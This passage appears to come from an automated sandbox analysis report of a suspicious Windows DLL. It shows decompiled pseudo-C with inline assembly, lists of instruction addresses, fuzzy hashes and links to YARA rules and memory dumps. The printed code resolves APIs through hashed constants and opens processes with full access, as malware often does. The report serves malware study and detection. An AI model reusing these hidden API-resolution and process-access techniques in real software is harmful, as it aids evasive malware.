				asm("movq [ebp+0x4d8], xmm0");
				E6E83F4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6E83F4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6E83F4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6E83F654( &_v316);
				return E6E83F654( &_v356);
			}

0x6e831494
0x6e831498
0x6e83149d
0x6e8314a3
0x6e8314ab
0x6e8314b0
0x6e8314bc
0x6e8314c0
0x6e8314d2
0x6e8314e8
0x6e8314f3
0x6e8314f4
0x6e8314f5
0x6e8314f6
0x6e8314f7
0x6e8314fa
0x6e8314fe
0x6e831502
0x6e831509
0x6e83151b
0x6e831531
0x6e83153c
0x6e83153d
0x6e83153e
0x6e83153f
0x6e831540
0x6e831543
0x6e831547
0x6e83154b
0x6e831552
0x6e831564
0x6e83157a
0x6e831585
0x6e831586
0x6e831587
0x6e831588
0x6e831589
0x6e83158c
0x6e831590
0x6e831594
0x6e83159b
0x6e8315ad
0x6e8315c3
0x6e8315ce
0x6e8315cf
0x6e8315d0
0x6e8315d1
0x6e8315d2
0x6e8315d5
0x6e8315d9
0x6e8315dd
0x6e8315e4
0x6e8315f6
0x6e83160c
0x6e831617
0x6e831618
0x6e831619
0x6e83161a
0x6e83161b
0x6e83161e
0x6e831622
0x6e831626
0x6e83162d
0x6e83163f
0x6e831655
0x6e831660
0x6e831661
0x6e831662
0x6e831663
0x6e831664
0x6e831667
0x6e83166b
0x6e83166f
0x6e831676
0x6e831688
0x6e83169e
0x6e8316a9
0x6e8316aa
0x6e8316ab
0x6e8316ac
0x6e8316ad
0x6e8316b0
0x6e8316b4
0x6e8316b8
0x6e8316bf
0x6e8316d1
0x6e8316e7
0x6e8316f2
0x6e8316f3
0x6e8316f4
0x6e8316f5
0x6e8316f6
0x6e8316f9
0x6e8316fd
0x6e831701
0x6e831708
0x6e83171a
0x6e831730
0x6e83173b
0x6e83173c
0x6e83173d
0x6e83173e
0x6e83173f
0x6e831742
0x6e831746
0x6e83174a
0x6e831751
0x6e831763
0x6e831779
0x6e831784
0x6e831785
0x6e831786
0x6e831787
0x6e831788
0x6e83178b
0x6e83178f
0x6e831793
0x6e83179a
0x6e8317ac
0x6e8317c2
0x6e8317cd
0x6e8317ce
0x6e8317cf
0x6e8317d0
0x6e8317d1
0x6e8317d4
0x6e8317d8
0x6e8317dc
0x6e8317e3
0x6e8317f5
0x6e83180b
0x6e831816
0x6e831817
0x6e831818
0x6e831819
0x6e83181a
0x6e83181d
0x6e831821
0x6e831825
0x6e83182c
0x6e83183e
0x6e831854
0x6e83185f
0x6e831860
0x6e831861
0x6e831862
0x6e831863
0x6e831866
0x6e83186a
0x6e83186e
0x6e831875
0x6e831887
0x6e83189d
0x6e8318a8
0x6e8318a9
0x6e8318aa
0x6e8318ab
0x6e8318ac
0x6e8318af
0x6e8318b3
0x6e8318b7
0x6e8318be
0x6e8318d0
0x6e8318e6
0x6e8318f1
0x6e8318f2
0x6e8318f3
0x6e8318f4
0x6e8318f5
0x6e8318f8
0x6e8318fc
0x6e831900
0x6e831907
0x6e831919
0x6e83192f
0x6e83193a
0x6e83193b
0x6e83193c
0x6e83193d
0x6e83193e
0x6e831941
0x6e831945
0x6e831949
0x6e831950
0x6e831962
0x6e831978
0x6e831983
0x6e831984
0x6e831985
0x6e831986
0x6e83198c
0x6e83198f
0x6e831991
0x6e83199c
0x6e8319a3
0x6e8319ac
0x6e8319b4
0x6e8319bb
0x6e8319c4
0x6e8319cc
0x6e8319d3
0x6e8319dc
0x6e8319e4
0x6e8319eb
0x6e8319f4
0x6e8319fc
0x6e831a03
0x6e831a0c
0x6e831a14
0x6e831a1b
0x6e831a24
0x6e831a2c
0x6e831a36
0x6e831a3f
0x6e831a47
0x6e831a51
0x6e831a5a
0x6e831a62
0x6e831a6c
0x6e831a75
0x6e831a7d
0x6e831a87
0x6e831a90
0x6e831a98
0x6e831aa2
0x6e831aab
0x6e831ab3
0x6e831abd
0x6e831ac6
0x6e831ace
0x6e831ad8
0x6e831ae1
0x6e831ae9
0x6e831af3
0x6e831afc
0x6e831b04
0x6e831b0e
0x6e831b17
0x6e831b1f
0x6e831b26
0x6e831b2f
0x6e831b37
0x6e831b3e
0x6e831b43
0x6e831b51
0x6e831b55
0x6e831b64
0x6e831b6d
0x6e831b72
0x6e831b79
0x6e831b7d
0x6e831b81
0x6e831b88
0x6e831b9a
0x6e831bb0
0x6e831bbb
0x6e831bbc
0x6e831bbd
0x6e831bbe
0x6e831bbf
0x6e831bc2
0x6e831bc6
0x6e831bca
0x6e831bd1
0x6e831be3
0x6e831bf9
0x6e831c04
0x6e831c05
0x6e831c06
0x6e831c07
0x6e831c08
0x6e831c0b
0x6e831c0f
0x6e831c13
0x6e831c1a
0x6e831c2c
0x6e831c42
0x6e831c4d
0x6e831c4e
0x6e831c4f
0x6e831c50
0x6e831c51
0x6e831c54
0x6e831c58
0x6e831c5c
0x6e831c63
0x6e831c75
0x6e831c8b
0x6e831c96
0x6e831c97
0x6e831c98
0x6e831c99
0x6e831c9a
0x6e831c9d
0x6e831ca0
0x6e831ca1
0x6e831ca2
0x6e831ca9
0x6e831cac
0x6e831cb7
0x6e831cbe
0x6e831cc7
0x6e831ccf
0x6e831cd6
0x6e831cdf
0x6e831ce7
0x6e831cee
0x6e831cf7
0x6e831cff
0x6e831d04
0x6e831d0d
0x6e831d15
0x6e831d2a

Strings

8nsK, xrefs: 6E831900

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 8nsK
API String ID: 0-3012451157
Opcode ID: 60b1e94d03bf4eca53a3807416a63dd6bf793c8da0414a784cc05012ea9fc06e
Instruction ID: 61da0fa171174a9672fd602cd7ccdec2e4fab4cb3b3538692a533d7b16b757e1
Opcode Fuzzy Hash: 60b1e94d03bf4eca53a3807416a63dd6bf793c8da0414a784cc05012ea9fc06e
Instruction Fuzzy Hash: 4232A672404706ABC715DFA4C9509EF77A4AFB1208F308F1DB5896A1A2FF71E986C6C1

Uniqueness

Uniqueness Score: -1.00%

Function 6E83A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6E83A4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6E83B658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6E83F4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6E83F654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6E842234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6E83F654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6E83F584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6E83F584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6e84b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6E843064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6E83F4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6E83F4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6E83B5C4(_t439 + 0x34);
											E6E83B5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6E83B5C4(_t439 + 0x34);
										E6E83B5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6E83F4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6E83CA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6E83C280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6E83F828(_t439 + 0x14, E6E83F4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6E83F4BC(_t439 + 0x14, E6E83F4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6E843064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6E83F828(_t439 + 0x40, E6E83F4CC(_t439 + 0x3c) + 4);
											 *(E6E83F4BC(_t439 + 0x40, E6E83F4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6E83CD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6E83F4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6E83F4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6E83AC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6E83CD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6E83F4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6E83F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6E83F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6E83F4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6E83F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6E8438F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6E83F4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6E83F828( *((intOrPtr*)(_t439 + 8)), E6E83F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6E83F4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6E83F4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6E83F4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6E83F4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6E8438F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6E83F4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6E83F828( *((intOrPtr*)(_t439 + 4)), E6E83F4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6E83F828( *((intOrPtr*)(_t439 + 8)), E6E83F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6E83F4BC( *((intOrPtr*)(_t439 + 8)), E6E83F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6E83F828( *((intOrPtr*)(_t439 + 4)), E6E83F4CC( *_t439) + 4);
								 *(E6E83F4BC( *((intOrPtr*)(_t439 + 4)), E6E83F4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6E83F4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6E843064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6E83F4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6E83F828( *((intOrPtr*)(_t439 + 8)), E6E83F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6E83F4BC( *((intOrPtr*)(_t439 + 8)), E6E83F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6E83F4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6E83F828( *((intOrPtr*)(_t439 + 4)), E6E83F4CC( *_t439) + 4);
										 *(E6E83F4BC( *((intOrPtr*)(_t439 + 4)), E6E83F4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E83F4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6E83F4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6E83F4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6E83F4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6E83F4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6E83F4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6E8438F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6E83F4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6E83F828( *((intOrPtr*)(_t439 + 4)), E6E83F4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6E843064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6E83F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6E83F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6E83F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6E83F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6E83F4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6E8438F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6E83F4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6E83F828( *((intOrPtr*)(_t439 + 8)), E6E83F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E83F4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6e83a4f2
0x6e83a4f4
0x6e83a4ff
0x6e83a505
0x6e83a509
0x6e83a50e
0x6e83a514
0x6e83a524
0x00000000
0x6e83a526
0x6e83a526
0x6e83a531
0x6e83a531
0x6e83aaaf
0x6e83aab1
0x6e83aab2
0x6e83aaf1
0x6e83aaf5
0x6e83ab03
0x6e83ab11
0x6e83ab11
0x6e83aafc
0x6e83ab17
0x6e83ab1c
0x00000000
0x6e83ab1c
0x6e83ab00
0x6e83ab01
0x00000000
0x6e83a53b
0x6e83a53b
0x6e83a53f
0x6e83a646
0x6e83a646
0x6e83a64b
0x6e83a75c
0x6e83a760
0x6e83a765
0x6e83a769
0x6e83a893
0x6e83a895
0x6e83a899
0x6e83a8a2
0x6e83a8ab
0x6e83a8af
0x6e83a8b8
0x6e83a8bf
0x6e83a8c0
0x6e83a8c4
0x6e83a8c8
0x6e83a8cc
0x6e83a8ce
0x6e83aa38
0x6e83aa38
0x6e83aa40
0x6e83aa58
0x6e83aa5a
0x6e83aa5c
0x6e83aa96
0x6e83aa96
0x6e83aa98
0x6e83aa98
0x6e83aa9b
0x6e83aab6
0x6e83aaca
0x6e83aacd
0x6e83aad2
0x6e83aadd
0x6e83aade
0x6e83aae1
0x6e83aae3
0x6e83aaec
0x00000000
0x6e83aaec
0x6e83aa9d
0x6e83aaa1
0x6e83aaaa
0x00000000
0x6e83aaaa
0x6e83aa6d
0x6e83aa7d
0x6e83aa81
0x6e83aa81
0x6e83aa84
0x6e83aa87
0x6e83aa8a
0x6e83aa90
0x00000000
0x00000000
0x00000000
0x6e83aa92
0x6e83a8d6
0x6e83a8d6
0x6e83a8d8
0x6e83a8dc
0x6e83a8e1
0x6e83a8e3
0x6e83a8e7
0x6e83a8ea
0x6e83a8f2
0x6e83a8f4
0x00000000
0x00000000
0x6e83a90b
0x6e83a926
0x6e83a928
0x6e83a93b
0x6e83a93d
0x6e83a93f
0x6e83a95a
0x6e83a95a
0x6e83a95e
0x6e83a960
0x00000000
0x00000000
0x6e83a962
0x6e83a965
0x6e83a986
0x6e83a9a5
0x6e83a9ab
0x6e83a9ae
0x6e83a9b3
0x6e83a9b4
0x6e83a9b8
0x00000000
0x00000000
0x6e83a9c0
0x6e83a9c0
0x6e83a9c2
0x6e83a9ce
0x6e83a9da
0x6e83a9e4
0x6e83a9e7
0x6e83a9ea
0x6e83a9ee
0x6e83a9f5
0x6e83a9f9
0x6e83a9fd
0x6e83a9fe
0x6e83aa02
0x6e83aa07
0x6e83aa0c
0x6e83aa10
0x6e83aa14
0x6e83aa1a
0x6e83aa20
0x6e83aa26
0x6e83aa2c
0x6e83aa31
0x6e83aa32
0x6e83aa32
0x00000000
0x6e83a9c2
0x00000000
0x6e83a965
0x6e83a943
0x6e83a954
0x6e83a956
0x6e83a958
0x00000000
0x00000000
0x00000000
0x6e83a958
0x6e83a96b
0x00000000
0x6e83a96b
0x6e83a76f
0x6e83a772
0x6e83a774
0x00000000
0x00000000
0x6e83a77c
0x6e83a77c
0x6e83a77e
0x6e83a77e
0x6e83a78f
0x6e83a791
0x6e83a794
0x00000000
0x00000000
0x6e83a88a
0x6e83a88b
0x6e83a88d
0x00000000
0x00000000
0x00000000
0x6e83a88d
0x6e83a79a
0x6e83a79d
0x6e83a7a7
0x6e83a7ac
0x6e83a7ae
0x6e83a7b4
0x6e83a7bb
0x6e83a7bf
0x6e83a7c4
0x6e83a7c8
0x6e83ac03
0x6e83ac17
0x6e83ac3a
0x6e83ac3f
0x6e83ac3f
0x6e83a7df
0x6e83a7e4
0x6e83a7e4
0x6e83a7e4
0x6e83a7e4
0x6e83a7ea
0x6e83a7ef
0x6e83a7f1
0x6e83a7f6
0x6e83a7fd
0x6e83a802
0x6e83a804
0x6e83abc1
0x6e83abd2
0x6e83abec
0x6e83abf1
0x6e83abf1
0x6e83a81a
0x6e83a81f
0x6e83a81f
0x6e83a81f
0x6e83a81f
0x6e83a833
0x6e83a851
0x6e83a856
0x6e83a866
0x6e83a883
0x6e83a885
0x6e83a885
0x00000000
0x6e83a79d
0x6e83a653
0x6e83a653
0x6e83a655
0x6e83a65c
0x6e83a66a
0x6e83a66c
0x6e83a66f
0x6e83a676
0x6e83a678
0x6e83a6a9
0x6e83a6b8
0x6e83a6ba
0x6e83a6bc
0x6e83a6da
0x6e83a6dc
0x6e83a6de
0x6e83a6f1
0x6e83a710
0x6e83a716
0x6e83a719
0x6e83a730
0x6e83a74c
0x6e83a74e
0x6e83a74e
0x6e83a74e
0x6e83a74e
0x6e83a6de
0x00000000
0x6e83a6bc
0x6e83a67c
0x6e83a67c
0x6e83a67e
0x6e83a68f
0x6e83a691
0x6e83a693
0x00000000
0x00000000
0x6e83a69f
0x6e83a6a0
0x6e83a6a7
0x00000000
0x00000000
0x00000000
0x6e83a6a7
0x6e83a695
0x6e83a698
0x00000000
0x00000000
0x6e83a751
0x6e83a751
0x6e83a752
0x6e83a752
0x00000000
0x6e83a545
0x6e83a547
0x6e83a547
0x6e83a549
0x6e83a550
0x6e83a55e
0x6e83a560
0x6e83a564
0x6e83a568
0x6e83a56a
0x6e83a598
0x6e83a59b
0x6e83a5a0
0x6e83a5a4
0x6e83a5a9
0x6e83a5b0
0x6e83a5b5
0x6e83a5b7
0x6e83ab7e
0x6e83ab8f
0x6e83abaf
0x6e83abb4
0x6e83abb4
0x6e83a5cd
0x6e83a5d2
0x6e83a5d2
0x6e83a5d2
0x6e83a5d2
0x6e83a5e4
0x6e83a5e6
0x6e83a5e8
0x6e83a5f9
0x6e83a5f9
0x6e83a5ff
0x6e83a604
0x6e83a608
0x6e83a60e
0x6e83a615
0x6e83a61a
0x6e83a61c
0x6e83ab32
0x6e83ab43
0x6e83ab64
0x6e83ab69
0x6e83ab69
0x6e83a633
0x6e83a638
0x6e83a638
0x6e83a638
0x6e83a638
0x6e83a63b
0x6e83a63b
0x00000000
0x6e83a63b
0x6e83a56e
0x6e83a56e
0x6e83a570
0x6e83a581
0x6e83a583
0x6e83a585
0x00000000
0x00000000
0x6e83a591
0x6e83a592
0x6e83a596
0x00000000
0x00000000
0x00000000
0x6e83a596
0x6e83a587
0x6e83a58a
0x00000000
0x00000000
0x6e83a63c
0x6e83a63c
0x6e83a63d
0x6e83a63d
0x00000000
0x6e83a549
0x6e83a53f

Strings

, xrefs: 6E83AAF7

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: a288fc72ace99845cabf7b97b6650cb073a1c3ae87f6c3e8642973acde8f413f
Instruction ID: 408aefe0af9dd29d618f696563dfba518756acfa94389618224fd6b800dcae2e
Opcode Fuzzy Hash: a288fc72ace99845cabf7b97b6650cb073a1c3ae87f6c3e8642973acde8f413f
Instruction Fuzzy Hash: 4F1284715042259FC714DFE8C980AAEB7A9EF95704F308E5DE999972A1DB30DD01CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 6E838428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E838428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
